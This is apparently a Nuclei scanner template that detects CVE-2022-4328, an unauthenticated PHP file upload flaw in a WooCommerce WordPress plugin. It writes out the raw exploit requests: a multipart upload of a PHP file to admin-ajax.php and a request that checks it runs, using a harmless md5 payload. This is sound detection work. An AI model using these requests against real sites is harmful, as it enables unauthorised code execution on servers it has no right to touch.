nuclei-templates/http/cves/2022/CVE-2022-4328.yaml

id: CVE-2022-4328

info:
  name: WooCommerce Checkout Field Manager < 18.0 - Arbitrary File Upload
  author: theamanrawat
  severity: critical
  description: |
    The WooCommerce Checkout Field Manager WordPress plugin before 18.0 does not validate files to be uploaded, which could allow unauthenticated attackers to upload arbitrary files such as PHP on the server.    
  remediation: Fixed in version 18.0
  reference:
    - https://wpscan.com/vulnerability/4dc72cd2-81d7-4a66-86bd-c9cfaf690eed
    - https://wordpress.org/plugins/n-media-woocommerce-checkout-fields/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-4328
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-4328
    cwe-id: CWE-434
    epss-score: 0.45141
    epss-percentile: 0.97044
    cpe: cpe:2.3:a:najeebmedia:woocommerce_checkout_field_manager:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: najeebmedia
    product: woocommerce_checkout_field_manager
    framework: wordpress
  tags: wp,n-media-woocommerce-checkout-fields,wpscan,cve,cve2022,rce,wordpress,wp-plugin,intrusive,najeebmedia

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php?action=cfom_upload_file&name={{randstr}}.pHp HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=------------------------22728be7b3104597

        --------------------------22728be7b3104597
        Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"
        Content-Type: application/octet-stream

        <?php echo md5("CVE-2022-4328"); ?>

        --------------------------22728be7b3104597--        
      - |
        GET /wp-content/uploads/cfom_files/{{to_lower('{{randstr}}')}}.php HTTP/1.1
        Host: {{Hostname}}        

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - fe5df26ce4ca0056ffae8854469c282f

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a00463044022067ec95a941beb77a83b3a65f32c76a80b0245c3575193af4fe92f9e7c94ead0002206eb81771f2ec0e7f68ccdbc427240f6032a5f9f6c3c6e4388f1f3d3db13b5a4c:922c64590222798bb761d5b6d8e72950